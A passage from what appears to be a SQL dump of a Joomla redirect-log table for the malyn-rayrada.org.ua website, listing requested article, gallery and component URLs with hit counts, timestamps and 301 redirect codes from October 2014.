22:11:06','0000-00-00 00:00:00',301),(6915,'http://www.malyn-rayrada.org.ua/beta1/components/com_community/index.html','','','',2,0,'2014-10-05 22:16:01','0000-00-00 00:00:00',301),(6916,'http://www.malyn-rayrada.org.ua/pktt/components/com_community/index.html','','','',1,0,'2014-10-05 22:27:50','0000-00-00 00:00:00',301),(6917,'http://malyn-rayrada.org.ua/en/components/com_community/index.html','','','',2,0,'2014-10-05 22:55:28','0000-00-00 00:00:00',301),(6918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=ru','','','',3,0,'2014-10-05 23:47:12','0000-00-00 00:00:00',301),(6919,'http://malyn-rayrada.org.ua/joomla1/components/com_community/index.html','','','',3,0,'2014-10-06 01:19:35','0000-00-00 00:00:00',301),(6920,'http://malyn-rayrada.org.ua/flpbac/components/com_community/index.html','','','',2,0,'2014-10-06 02:07:35','0000-00-00 00:00:00',301),(6921,'http://www.malyn-rayrada.org.ua/w1/components/com_community/index.html','','','',2,0,'2014-10-06 02:35:12','0000-00-00 00:00:00',301),(6922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&id=5&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-06 02:57:48','0000-00-00 00:00:00',301),(6923,'http://malyn-rayrada.org.ua/lika/components/com_community/index.html','','','',1,0,'2014-10-06 03:22:43','0000-00-00 00:00:00',301),(6924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1147:2013-11-28-09-57-12&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-06 04:33:30','0000-00-00 00:00:00',301),(6925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-06 04:44:07','0000-00-00 00:00:00',301),(6926,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=947:-lr-2012-2015-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-06 04:51:45','0000-00-00 00:00:00',301),(6927,'http://www.malyn-rayrada.org.ua/nl/components/com_community/index.html','','','',2,0,'2014-10-06 05:20:29','0000-00-00 00:00:00',301),(6928,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 05:25:25','0000-00-00 00:00:00',301),(6929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1086:2013-09-16-13-00-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-10-06 06:46:14','0000-00-00 00:00:00',301),(6930,'http://www.malyn-rayrada.org.ua/archive2/components/com_community/index.html','','','',1,0,'2014-10-06 06:58:53','0000-00-00 00:00:00',301),(6931,'http://www.malyn-rayrada.org.ua/ignaciogonzalez/components/com_community/index.html','','','',1,0,'2014-10-06 07:09:05','0000-00-00 00:00:00',301),(6932,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-06 07:24:24','0000-00-00 00:00:00',301),(6933,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&catid=58&Itemid=105&lang=en','','','',4,0,'2014-10-06 07:26:15','0000-00-00 00:00:00',301),(6934,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-06 07:26:54','0000-00-00 00:00:00',301),(6935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-06 08:50:12','0000-00-00 00:00:00',301),(6936,'http://www.malyn-rayrada.org.ua/archive/components/com_community/index.html','','','',6,0,'2014-10-06 08:55:22','0000-00-00 00:00:00',301),(6937,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=3&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 09:03:45','0000-00-00 00:00:00',301),(6938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-----lr--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-10-06 09:18:42','0000-00-00 00:00:00',301),(6939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&Itemid=14&lang=en','','','',6,0,'2014-10-06 09:50:40','0000-00-00 00:00:00',301),(6940,'http://www.malyn-rayrada.org.ua/donate/components/com_community/index.html','','','',1,0,'2014-10-06 10:03:54','0000-00-00 00:00:00',301),(6941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=en','','','',5,0,'2014-10-06 10:28:16','0000-00-00 00:00:00',301),(6942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-06 10:42:46','0000-00-00 00:00:00',301),(6943,'http://www.malyn-rayrada.org.ua/LKI_LT/components/com_community/index.html','','','',1,0,'2014-10-06 10:45:09','0000-00-00 00:00:00',301),(6944,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=923:-17-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-06 10:59:00','0000-00-00 00:00:00',301),(6945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=ru','','','',3,0,'2014-10-06 11:04:39','0000-00-00 00:00:00',301),(6946,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=948:-2012-&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%B7%D0%B2%D1%96%D1%82%20%D0%B3%D0%BE%D0%BB%D0%BE%D0%B2%D0%B8%20%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D1%83%20%D0%BF%D1%80%D0%BE','',4,0,'2014-10-06 11:06:56','0000-00-00 00:00:00',301),(6947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-06 11:15:13','0000-00-00 00:00:00',301),(6948,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-06 11:17:40','0000-00-00 00:00:00',301),(6949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1112:2013-10-23-09-24-43&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-06 11:28:06','0000-00-00 00:00:00',301),(6950,'http://www.malyn-rayrada.org.ua/agency/components/com_community/index.html','','','',1,0,'2014-10-06 11:33:17','0000-00-00 00:00:00',301),(6951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46:--21122012&Itemid=85&lang=uk','','','',7,0,'2014-10-06 11:50:15','0000-00-00 00:00:00',301),(6952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-06 12:02:49','0000-00-00 00:00:00',301),(6953,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-06 12:09:20','0000-00-00 00:00:00',301),(6954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-10-06 12:16:22','0000-00-00 00:00:00',301),(6955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53&Itemid=94&lang=en','','','',4,0,'2014-10-06 12:28:52','0000-00-00 00:00:00',301),(6956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-10-06 12:45:03','0000-00-00 00:00:00',301),(6957,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1194:-------------2012-2015--&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-06 13:00:27','0000-00-00 00:00:00',301),(6958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=36&Itemid=70&lang=en','','','',4,0,'2014-10-06 13:15:07','0000-00-00 00:00:00',301),(6959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-06 13:20:14','0000-00-00 00:00:00',301),(6960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54&Itemid=95&lang=uk','','','',9,0,'2014-10-06 13:20:15','0000-00-00 00:00:00',301),(6961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-06 13:20:23','0000-00-00 00:00:00',301),(6962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-10-06 13:20:24','0000-00-00 00:00:00',301),(6963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-06 13:20:26','0000-00-00 00:00:00',301),(6964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en','','','',2,0,'2014-10-06 13:25:01','0000-00-00 00:00:00',301),(6965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 13:25:31','0000-00-00 00:00:00',301),(6966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 13:25:38','0000-00-00 00:00:00',301),(6967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 13:25:39','0000-00-00 00:00:00',301),(6968,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 13:27:45','0000-00-00 00:00:00',301),(6969,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=en','','','',2,0,'2014-10-06 13:28:39','0000-00-00 00:00:00',301),(6970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 13:30:30','0000-00-00 00:00:00',301),(6971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru&Itemid=','','','',4,0,'2014-10-06 13:33:49','0000-00-00 00:00:00',301),(6972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=ru','','','',6,0,'2014-10-06 13:36:19','0000-00-00 00:00:00',301),(6973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54&Itemid=95&lang=uk','','','',7,0,'2014-10-06 13:37:06','0000-00-00 00:00:00',301),(6974,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=en','','','',3,0,'2014-10-06 13:37:31','0000-00-00 00:00:00',301),(6975,'http://www.malyn-rayrada.org.ua/en/components/com_community/index.html','','','',3,0,'2014-10-06 13:39:54','0000-00-00 00:00:00',301),(6976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-10-06 13:42:15','0000-00-00 00:00:00',301),(6977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49&Itemid=88&lang=en','','','',2,0,'2014-10-06 13:43:11','0000-00-00 00:00:00',301),(6978,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-10-06 13:47:43','0000-00-00 00:00:00',301),(6979,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 13:48:36','0000-00-00 00:00:00',301),(6980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=ru','','','',10,0,'2014-10-06 13:48:43','0000-00-00 00:00:00',301),(6981,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=uk','','','',8,0,'2014-10-06 13:52:36','0000-00-00 00:00:00',301),(6982,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-06 13:53:19','0000-00-00 00:00:00',301),(6983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-06 13:53:41','0000-00-00 00:00:00',301),(6984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 13:53:46','0000-00-00 00:00:00',301),(6985,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en','','','',2,0,'2014-10-06 13:53:49','0000-00-00 00:00:00',301),(6986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 13:53:57','0000-00-00 00:00:00',301),(6987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59&Itemid=107&lang=ru','','','',6,0,'2014-10-06 14:00:08','0000-00-00 00:00:00',301),(6988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:00:21','0000-00-00 00:00:00',301),(6989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 14:00:24','0000-00-00 00:00:00',301),(6990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:01:22','0000-00-00 00:00:00',301),(6991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 14:01:47','0000-00-00 00:00:00',301),(6992,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=0&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 14:01:48','0000-00-00 00:00:00',301),(6993,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=1&lang=en&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 14:02:51','0000-00-00 00:00:00',301),(6994,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=0&lang=en&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 14:03:11','0000-00-00 00:00:00',301),(6995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=en','','','',4,0,'2014-10-06 14:04:35','0000-00-00 00:00:00',301),(6996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 14:05:08','0000-00-00 00:00:00',301),(6997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 14:05:11','0000-00-00 00:00:00',301),(6998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:05:13','0000-00-00 00:00:00',301),(6999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 14:05:15','0000-00-00 00:00:00',301),(7000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=uk&Itemid=','','','',5,0,'2014-10-06 14:05:17','0000-00-00 00:00:00',301),(7001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 14:05:28','0000-00-00 00:00:00',301),(7002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 14:05:32','0000-00-00 00:00:00',301),(7003,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-06 14:05:34','0000-00-00 00:00:00',301),(7004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-06 14:05:38','0000-00-00 00:00:00',301),(7005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-06 14:06:52','0000-00-00 00:00:00',301),(7006,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en','','','',2,0,'2014-10-06 14:06:59','0000-00-00 00:00:00',301),(7007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 14:09:27','0000-00-00 00:00:00',301),(7008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:10:01','0000-00-00 00:00:00',301),(7009,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=0&lang=en','','','',5,0,'2014-10-06 14:10:25','0000-00-00 00:00:00',301),(7010,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=ru','','','',6,0,'2014-10-06 14:10:28','0000-00-00 00:00:00',301),(7011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-06 14:10:40','0000-00-00 00:00:00',301),(7012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en','','','',2,0,'2014-10-06 14:10:44','0000-00-00 00:00:00',301),(7013,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=en','','','',11,0,'2014-10-06 14:10:47','0000-00-00 00:00:00',301),(7014,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=en','','','',5,0,'2014-10-06 14:11:40','0000-00-00 00:00:00',301),(7015,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en','','','',2,0,'2014-10-06 14:11:45','0000-00-00 00:00:00',301),(7016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-06 14:13:54','0000-00-00 00:00:00',301),(7017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=ru','','','',3,0,'2014-10-06 14:15:31','0000-00-00 00:00:00',301),(7018,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-06 14:17:10','0000-00-00 00:00:00',301),(7019,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-06 14:18:38','0000-00-00 00:00:00',301),(7020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:18:46','0000-00-00 00:00:00',301),(7021,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=uk','','','',10,0,'2014-10-06 14:19:58','0000-00-00 00:00:00',301),(7022,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en','','','',2,0,'2014-10-06 14:20:33','0000-00-00 00:00:00',301),(7023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en','','','',2,0,'2014-10-06 14:20:43','0000-00-00 00:00:00',301),(7024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=en','','','',2,0,'2014-10-06 14:20:53','0000-00-00 00:00:00',301),(7025,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en','','','',2,0,'2014-10-06 14:25:54','0000-00-00 00:00:00',301),(7026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-06 14:28:39','0000-00-00 00:00:00',301),(7027,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en','','','',3,0,'2014-10-06 14:28:47','0000-00-00 00:00:00',301),(7028,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=0&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 14:30:10','0000-00-00 00:00:00',301),(7029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 14:30:19','0000-00-00 00:00:00',301),(7030,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-06 14:30:59','0000-00-00 00:00:00',301),(7031,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=1&lang=ru&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 14:32:09','0000-00-00 00:00:00',301),(7032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk','','','',4,0,'2014-10-06 14:33:05','0000-00-00 00:00:00',301),(7033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru','','','',3,0,'2014-10-06 14:33:20','0000-00-00 00:00:00',301),(7034,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-06 14:33:37','0000-00-00 00:00:00',301),(7035,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=0&lang=en&option=com_phocagallery&view=category','','','',5,0,'2014-10-06 14:33:59','0000-00-00 00:00:00',301),(7036,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 14:35:12','0000-00-00 00:00:00',301),(7037,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-06 14:35:30','0000-00-00 00:00:00',301),(7038,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=0&lang=ru&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 14:35:57','0000-00-00 00:00:00',301),(7039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 14:38:05','0000-00-00 00:00:00',301),(7040,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 14:38:08','0000-00-00 00:00:00',301),(7041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-10-06 14:38:11','0000-00-00 00:00:00',301),(7042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 14:38:18','0000-00-00 00:00:00',301),(7043,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=ru','','','',2,0,'2014-10-06 14:38:28','0000-00-00 00:00:00',301),(7044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&lang=ru','','','',1,0,'2014-10-06 14:38:41','0000-00-00 00:00:00',301),(7045,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=1&lang=uk&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 14:39:18','0000-00-00 00:00:00',301),(7046,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=en','','','',3,0,'2014-10-06 14:39:35','0000-00-00 00:00:00',301),(7047,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 14:40:17','0000-00-00 00:00:00',301),(7048,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=1&lang=en&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 14:40:18','0000-00-00 00:00:00',301),(7049,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=32&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 14:41:07','0000-00-00 00:00:00',301),(7050,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=32&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 14:42:00','0000-00-00 00:00:00',301),(7051,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=32&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 14:42:33','0000-00-00 00:00:00',301),(7052,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=32&lang=ru&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 14:43:14','0000-00-00 00:00:00',301),(7053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 14:43:42','0000-00-00 00:00:00',301),(7054,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&lang=ru&option=com_phocagallery&view=categories','','','',4,0,'2014-10-06 14:44:46','0000-00-00 00:00:00',301),(7055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=ru','','','',24,0,'2014-10-06 14:45:29','0000-00-00 00:00:00',301),(7056,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=uk','','','',3,0,'2014-10-06 14:45:52','0000-00-00 00:00:00',301),(7057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 14:45:53','0000-00-00 00:00:00',301),(7058,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-06 14:48:19','0000-00-00 00:00:00',301),(7059,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en','','','',2,0,'2014-10-06 14:49:07','0000-00-00 00:00:00',301),(7060,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk&Itemid=','','','',5,0,'2014-10-06 14:50:10','0000-00-00 00:00:00',301),(7061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en','','','',2,0,'2014-10-06 14:50:15','0000-00-00 